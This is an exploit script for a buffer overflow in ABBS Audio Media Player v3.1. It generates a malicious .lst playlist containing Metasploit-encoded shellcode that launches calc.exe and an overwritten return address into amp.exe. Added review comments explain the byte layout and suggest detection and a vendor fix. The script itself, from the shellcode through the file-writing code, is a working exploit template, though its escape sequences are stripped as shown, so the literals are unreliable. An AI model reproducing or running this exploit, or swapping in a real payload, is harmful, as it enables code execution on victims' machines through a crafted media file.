
# Title : ABBS Audio Media Player v3.1 (.lst) Buffer Overflow
# Published : 2013-05-04
# Author :


#!/usr/bin/python
 
# Exploit Title: ABBS Audio Media Player v3.1 (.lst) Buffer Overflow
# Version:       v3.1
# Date:          2013-05-04
# Author:        Julien Ahrens (@MrTuxracer)
# Homepage:      http://www.inshell.net
# Software Link: http://abbs.qsnx.net/
# Tested on:     Windows XP SP3 DE
#                Windows 7 SP1 64Bit DE
#                Windows 8 32/64Bit DE/EN
# Notes:         This exploit is for the current version and WinALL.
# Howto:         Open .lst

from struct import pack
 
# Relative path of the playlist file this script writes (resolved against the
# current working directory when it is opened further down).
# NOTE(review): the name `file` shadows the Python 2 builtin of the same name.
file="exploit.lst"

# Payload blob embedded in the generated file.
# Per the generator notes below, this is a Metasploit windows/exec stub that
# launches calc.exe (a proof-of-execution marker), passed through the
# x86/shikata_ga_nai encoder with three byte values excluded via -b.
# NOTE(review): as rendered on this page the string escapes have lost their
# backslashes (in the literal and in the -b argument), so what follows is
# plain text rather than the byte values the notes describe.
# NOTE(review): shikata_ga_nai output differs on every encoding run, so a
# signature on these exact bytes would not generalise; a detection is
# presumably better keyed on an over-long .lst entry or on the player
# starting an unexpected child process.
# windows/exec CMD=calc.exe 
# Encoder: x86/shikata_ga_nai
# powered by Metasploit 
# msfpayload windows/exec CMD=calc.exe R | msfencode -b 'x00x0ax0d'

shellcode = ("xdaxcaxbbxfdx11xa3xaexd9x74x24xf4x5ax31xc9" +
"xb1x33x31x5ax17x83xc2x04x03xa7x02x41x5bxab" +
"xcdx0cxa4x53x0ex6fx2cxb6x3fxbdx4axb3x12x71" +
"x18x91x9exfax4cx01x14x8ex58x26x9dx25xbfx09" +
"x1ex88x7fxc5xdcx8ax03x17x31x6dx3dxd8x44x6c" +
"x7ax04xa6x3cxd3x43x15xd1x50x11xa6xd0xb6x1e" +
"x96xaaxb3xe0x63x01xbdx30xdbx1exf5xa8x57x78" +
"x26xc9xb4x9ax1ax80xb1x69xe8x13x10xa0x11x22" +
"x5cx6fx2cx8bx51x71x68x2bx8ax04x82x48x37x1f" +
"x51x33xe3xaax44x93x60x0cxadx22xa4xcbx26x28" +
"x01x9fx61x2cx94x4cx1ax48x1dx73xcdxd9x65x50" +
"xc9x82x3exf9x48x6ex90x06x8axd6x4dxa3xc0xf4" +
"x9axd5x8ax92x5dx57xb1xdbx5ex67xbax4bx37x56" +
"x31x04x40x67x90x61xbex2dxb9xc3x57xe8x2bx56" +
"x3ax0bx86x94x43x88x23x64xb0x90x41x61xfcx16" +
"xb9x1bx6dxf3xbdx88x8exd6xddx4fx1dxbax0fxea" +
"xa5x59x50")

# Assemble the contents of the malformed .lst file as one string, in order:
#   junk1      filler sized so that junk1 + shellcode is meant to total 4108
#   shellcode  the payload blob
#   eip        4-byte little-endian value 0x00412c91 (see the author's note)
#   junk2      four more filler characters
#   evil       four trailing characters the author labels a terminator
# NOTE(review): as rendered on this page the string escapes have lost their
# backslashes, so the literals are plain text and the lengths computed here
# do not match the byte layout the comments describe.
# NOTE(review): the author's note places 0x00412c91 inside amp.exe. A fixed
# address in the application's own image is only usable as a return target if
# that module loads at a predictable base, which suggests amp.exe is built
# without ASLR -- confirm against the binary. The vendor-side fix is
# presumably a length check where .lst entries are parsed; /GS, /DYNAMICBASE
# and /NXCOMPAT are hardening on top of that, not a substitute for it.
junk1="x90" * (4108 - len(shellcode))
eip=pack('<L',0x00412c91) # ADD ESP,14 # POP EDI # POP ESI # POP EBX # RETN  ** [amp.exe] **  
junk2="x90" * 4
evil="x00" * 4 # Terminat0r
poc=junk1 + shellcode + eip + junk2 + evil


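# Write the assembled string to the output path and report the outcome.
# The with-statement closes the handle even if write() raises, and only I/O
# failures are reported as errors, so Ctrl-C and programming mistakes (for
# example a NameError) are no longer hidden behind the generic message.
# Single-argument print(...) behaves the same on Python 2 and Python 3.
try:
    print("[*] Creating exploit file...n")
    with open(file, "w") as writeFile:
        writeFile.write(poc)
    print("[*] File successfully created!")
except (IOError, OSError):
    print("[!] Error while creating file!")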